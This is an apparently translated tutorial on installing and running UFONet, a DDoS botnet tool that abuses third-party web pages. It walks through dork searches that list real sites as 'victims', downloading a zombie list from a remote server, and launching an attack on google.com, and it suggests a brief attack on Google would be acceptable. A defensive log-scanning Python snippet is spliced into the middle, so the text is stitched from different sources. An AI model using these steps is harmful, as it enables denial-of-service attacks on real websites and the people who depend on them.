- UFOnet
A program that can be used to test DDoS attacks using zombie PCs.
[Warning] Never use this for real!!
- Installation
https://sourceforge.net/projects/ufonet/?source=directory
Go to sourceforge.net and download it.
(KaliLinux)
> Save the file.
> It will be saved in the Downloads folder.
# mkdir -p /test1 && cd /test1
# mv ~/Downloads/ufonet-v0.9.zip .
# unzip ufonet-v0.9.zip
# cd ufonet ; ls
MANIFEST.in botnet core docs server setup.py ufonet
- Usage
# cd /test1/ufonet
# ./ufonet
===========================================================================
UFONet - DDoS Botnet via Web Abuse - by psy
===========================================================================
Total bots: 5 = [ Z:1 + A:1 + D:1 + U:1 + R:1 ]
===========================================================================
-> For HELP use: -h or --help
-> For WEB interface use: --gui
===========================================================================
# ./ufonet --help
Usage: ./ufonet [options]

UFONet - DDoS Botnet via Web Abuse - by psy

Options:
  --version            show program's version number and exit
  -h, --help           show this help message and exit
  -v, --verbose        active verbose on requests
  --update             check for latest stable version
  --check-tor          check to see if Tor is used properly
  --force-yes          set 'YES' to all questions
  --gui                run GUI (UFONet Web Interface)

  *Tools*:
  --crypter            Encrypt/Decrypt messages using AES256+HMAC-SHA1

  *Configure Request(s)*:
  --proxy=PROXY        Use proxy server (tor: 'http://127.0.0.1:8118')
  --user-agent=AGENT   Use another HTTP User-Agent header (default SPOOFED)
  --referer=REFERER    Use another HTTP Referer header (default SPOOFED)
  --host=HOST          Use another HTTP Host header (default NONE)
  --xforw              Set your HTTP X-Forwarded-For with random IP values
  --xclient            Set your HTTP X-Client-IP with random IP values
  --timeout=TIMEOUT    Select your timeout (default 10)
  --retries=RETRIES    Retries when the connection timeouts (default 1)
  --threads=THREADS    Maximum number of concurrent HTTP requests (default 5)
  --delay=DELAY        Delay in seconds between each HTTP request (default 0)

  *Search for 'Zombies'*:
  -s SEARCH            Search from a 'dork' (ex: -s 'proxy.php?url=')
  --sd=DORKS           Search from 'dorks' file (ex: --sd 'botnet/dorks.txt')
  --sn=NUM_RESULTS     Set max number of results for engine (default 10)
  --se=ENGINE          Search engine to use for 'dorking' (default bing)
  --sa                 Search massively using all search engines
  --auto-search        Search automatically for 'zombies' (may take time!)

  *Test Botnet*:
  -t TEST              Update 'zombies' status (ex: -t 'botnet/zombies.txt')
  --attack-me          Order 'zombies' to attack you (NAT required!)
  --test-rpc           Update 'xml-rpc' reflectors status

  *Community*:
  --download-zombies   Download 'zombies' from Community server
  --upload-zombies     Upload your 'zombies' to Community server
  --blackhole          Create a 'blackhole' to share your 'zombies'
  --up-to=UPIP         Upload your 'zombies' to a 'blackhole'
  --down-from=DIP      Download your 'zombies' from a 'blackhole'

  *Research Target*:
  -i INSPECT           Search biggest file (ex: -i 'http(s)://target.com')
  -x ABDUCTION         Examine webserver configuration (+CVE info)

  *Extra Attack(s)*:
  --db=DBSTRESS        Set db stress input point (ex: --db 'search.php?q=')
  --loic=LOIC          Start 'DoS' Web LOIC attack (ex: --loic 100)

  *Configure Attack(s)*:
  --no-head            Disable status check: 'Is target up?'
  --no-aliens          Disable 'aliens' web abuse
  --no-droids          Disable 'droids' redirectors
  --no-ucavs           Disable 'ucavs' checkers
  --no-rpcs            Disable 'xml-rpcs' reflectors
  -r ROUNDS            Set number of rounds (default 1)
  -b PLACE             Set place to attack (ex: -b '/path/big.jpg')
  -a TARGET            Start 'DDoS' attack (ex: -a 'http(s)://target.com')
* Class: UFONet -ViPR404-
* Type: Scout/Transporter
* Botnet (featured):
  -Zombies: HTTP GET bots
  -Droids : HTTP GET (+params) bots
  -Aliens : HTTP POST bots
  -UCAVs : Web Abusing bots
  -X-RPCs : XML-RPC bots
===========================================================================
UFONet - DDoS Botnet via Web Abuse - by psy
===========================================================================
Searching for NEW 'zombies' (not present on your list) using: google
======================
[Error] - This search engine is not supported!
Wanna try a different search engine (Y/n) y
Search engines available:
-------------------------
+ bing
+ yahoo
+ yandex
-------------------------
Ex: ufonet -s 'proxy.php?url=' --se 'bing'
Bye!
> It looks like Google has been blocked.
# ./ufonet -s 'index.php?ur=' --se yahoo
Searching for NEW 'zombies' (not present on your list) using: yahoo
======================
+Victim found: http://www.atlasdedermatologieprofessionnelle.com/index.php/Urticaires_physiques/RK=2/RS=pPuZDr9DCGqQyRY4YCon2imD6j8-index.php?ur=
------------
+Victim found: http://videotheque.cnrs.fr/index.php?ur14action=doc&id_doc=502/RK=2/RS=TLdYrFPKCjoHyVh9tQlTohGzsj0-index.php?ur=
------------
+Victim found: http://fencebiryayincilik.com/index.php/ur//RK=2/RS=P5hykWCePfQGaQ_wB5vE_Jn.rYk-index.php?ur=
------------
+Victim found: http://old.admr.org/federations/index.php?urlasso=is-sur-tille.fede21/RK=2/RS=2kt1Rmgs0Ji7.rg9W9dOJ3ggf78-index.php?ur=
------------
+Victim found: https://style-ur.com/index.php?ur=
------------
+Victim found: https://urjkk.com/index.php?ur=
------------
======================
+Possible Zombies: 6
======================
Wanna check if they are valid zombies? (Y/n) y
Are 'they' alive? :-) (HEAD Check):
===================================
Trying: 6
---------------------
Zombie: style-ur.com
Status: Ok [200]
----------
Zombie: urjkk.com
Status: Ok [200]
----------
Zombie: fencebiryayincilik.com
Status: Ok [200]
----------
Zombie: old.admr.org
Status: Not Found [404]
----------
Zombie: www.atlasdedermatologieprofessionnelle.com
Status: Ok [200]
----------
Zombie: videotheque.cnrs.fr
Status: Ok [200]
----------
==================
OK: 5 Fail: 1
==================
======================
Checking for payloads:
======================
Trying: 5
---------------------
Vector: https://style-ur.com/index.php?ur=
Status: Not ready...
----------
Vector: http://fencebiryayincilik.com/index.php/ur//RK=2/RS=P5hykWCePfQGaQ_wB5vE_Jn.rYk-index.php?ur=
Status: Not ready...
----------
Vector: https://urjkk.com/index.php?ur=
Status: Not ready...
----------
Vector: http://videotheque.cnrs.fr/index.php?ur14action=doc&id_doc=502/RK=2/RS=TLdYrFPKCjoHyVh9tQlTohGzsj0-index.php?ur=
Status: Not ready...
----------
Vector: http://www.atlasdedermatologieprofessionnelle.com/index.php/Urticaires_physiques/RK=2/RS=pPuZDr9DCGqQyRY4YCon2imD6j8-index.php?ur=
Status: Not ready...
----------
==================
OK: 0 Fail: 5
==================
==================
Army of 'zombies'
==================
------------------
Total Army: 0
------------------
[Info] - Not any zombie active!
> The search works with Yahoo.
> Six zombie PCs are found and all but one are alive, but none of them is payload-capable.
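The search step above looks for third-party pages that accept a URL in a query parameter (the `proxy.php?url=` style from the help text). From the operator's side, the same pattern can be detected in a site's own access log; the following is an added example, not part of the original post or of UFONet, and the log lines, hostnames and `OWN_HOSTS` are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: hostnames of the site being defended (placeholders).
OWN_HOSTS = {"www.example.org", "example.org"}

# Constructed access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Dec/2017:10:00:01 +0900] "GET /index.php?url=http://victim.example.net/big.jpg HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2017:10:00:01 +0900] "GET /index.php?url=http%3A%2F%2Fvictim.example.net%2Fbig.jpg HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Dec/2017:10:00:02 +0900] "GET /index.php?url=/about.html HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Dec/2017:10:00:03 +0900] "GET /proxy.php?url=//victim.example.net/ HTTP/1.1" 200 512 "-" "curl/7.57"
192.0.2.15 - - [12/Dec/2017:10:00:04 +0900] "GET /go?next=https://www.example.org/home HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def external_target(value):
    """Return the foreign host a parameter value points at, or None."""
    try:
        parts = urlsplit(value.strip())
        host = (parts.hostname or "").lower()
    except ValueError:          # malformed value, e.g. an unclosed IPv6 bracket
        return None
    # Absolute (http://host) and scheme-relative (//host) values both leave the site.
    if parts.scheme in ("", "http", "https") and host and host not in OWN_HOSTS:
        return host
    return None

def find_relay_requests(log_text):
    """Return (client_ip, path, parameter, foreign_host, status) per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        try:
            url = urlsplit(target)
        except ValueError:
            continue
        # parse_qsl percent-decodes, so encoded and plain values are treated alike.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            host = external_target(value)
            if host:
                hits.append((client, url.path, name, host, status))
    return hits

if __name__ == "__main__":
    print(*find_relay_requests(SAMPLE_LOG), sep="\n")
```

A parameter that keeps appearing in the results with 3xx or 200 responses is a candidate for an allowlist of permitted redirect targets.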
# ./ufonet --download-zombie ( Downloads the zombie list. )
Downloading list of 'zombies' from server ...
======================
Trying 'blackhole': 176.28.23.46
Vortex: IS READY!
------------
[Info] - Zombies: 1228
[Info] - Droids : 48
[Info] - Aliens : 4
[Info] - UCAVs : 3
[Info] - X-RPCs : 822
[Info] - Congratulations!. Total downloaded: 2105
------------
Wanna merge ONLY new 'troops' to your army (Y/n)y
-------------------------
[Info] - Botnet updated! ;-)
# ./ufonet -a http://www.google.com
Attacking: http://www.google.com
=======================================================
=====================
Round: 'Is target up?'
=====================
[Info] From here: YES
---------------------
[Info] From exterior: YES
---------------------
[Info] Your target looks ONLINE!. Wanna start a DDoS attack? (y/N) n
Bye!
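> The attack is carried out with the downloaded zombie PCs.
> We cancel without running the DDoS attack. Google has so many users that attacking it and cutting the attack off quickly would be okay, but you must not practice against Naver or Daum.
> Stop it with Ctrl+Z to send it to the background, check it with the jobs command, and terminate it with kill.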
- GUI
# ./ufonet --gui
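> Click START
> We need to find zombie PCs, so click Botnet first
> The settings made in the TUI are shown.
> Use everything in the list, select yahoo as in the command-line search, and click SEARCH.
> Scrolling down, it runs the same way as when the command is executed.
> To attack, select a URL and an image and click ATTACK. Ordinary pages must not be attacked.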